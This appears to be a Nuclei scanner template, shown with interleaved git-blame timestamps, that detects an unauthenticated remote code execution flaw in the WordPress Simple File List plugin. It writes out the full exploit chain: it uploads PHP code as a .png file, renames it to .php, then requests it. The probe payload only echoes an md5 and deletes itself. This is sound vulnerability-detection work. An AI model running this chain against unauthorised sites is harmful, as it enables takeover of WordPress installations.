2021-03-10 11:36:11 +00:00
id : wordpress-rce-simplefilelist
info :
2022-06-03 19:12:31 +00:00
name : WordPress SimpleFilelist - Remote Code Execution
2021-03-10 11:36:11 +00:00
author : princechaddha
severity : critical
2021-04-27 11:02:08 +00:00
description : |
2022-06-03 19:12:31 +00:00
Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
2022-04-22 10:38:41 +00:00
reference :
- https://wpscan.com/vulnerability/10192
2022-06-03 19:12:31 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score : 10
2022-06-03 19:12:31 +00:00
cwe-id : CWE-77
2023-04-28 08:11:21 +00:00
metadata :
max-request : 3
2023-05-23 08:06:55 +00:00
tags : wp,wpscan,wordpress,wp-plugin,rce,intrusive,fileupload
2024-04-15 11:26:37 +00:00
2023-05-23 08:05:51 +00:00
variables :
filepath : '{{rand_base(7, "abcdefghi")}}'
2024-04-15 11:26:37 +00:00
string : "wordpress-rce-simplefilelist"
2021-03-10 11:36:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-10 11:36:11 +00:00
- raw :
- |
POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition : form-data; name="eeSFL_ID"
1
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition : form-data; name="eeSFL_FileUploadDir"
/wp-content/uploads/simple-file-list/
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition : form-data; name="eeSFL_Timestamp"
1587258885
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition : form-data; name="eeSFL_Token"
ba288252629a5399759b6fde1e205bc2
--6985fa39c0698d07f6d418b37388e1b2
2023-05-23 08:05:51 +00:00
Content-Disposition : form-data; name="file"; filename="{{filepath}}.png"
2021-03-10 11:36:11 +00:00
Content-Type : image/png
2024-04-15 11:26:37 +00:00
<?php echo md5("{{string}}");unlink(__FILE__);?>
2021-03-10 11:36:11 +00:00
--6985fa39c0698d07f6d418b37388e1b2--
- |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
Host : {{Hostname}}
2021-09-09 06:39:13 +00:00
X-Requested-With : XMLHttpRequest
2021-03-10 11:36:11 +00:00
Accept : */*
Content-Type : application/x-www-form-urlencoded
2023-05-23 08:05:51 +00:00
eeSFL_ID=1&eeFileOld={{filepath}}.png&eeListFolder=%2F&eeFileAction=Rename%7C{{filepath}}.php
2021-03-10 11:36:11 +00:00
- |
2023-05-23 08:05:51 +00:00
GET /wp-content/uploads/simple-file-list/{{filepath}}.php HTTP/1.1
2021-03-10 11:36:11 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
2024-04-15 11:26:37 +00:00
part : body_3
2021-03-10 11:36:11 +00:00
words :
2024-04-15 11:26:37 +00:00
- '{{md5(string)}}'
2023-05-23 08:05:51 +00:00
2021-03-10 11:36:11 +00:00
- type : status
status :
2021-04-13 12:56:30 +00:00
- 200
2024-04-23 10:06:08 +00:00
# digest: 4a0a004730450220468406d7fd3f5a430ca59c464f7a38ea5fa76926c59866eae84275d8a1067004022100a404aa2d7213b95e2da9f6d1c651cd5d7528ed1ae4ebad8e1a12751f65d56d76:922c64590222798bb761d5b6d8e72950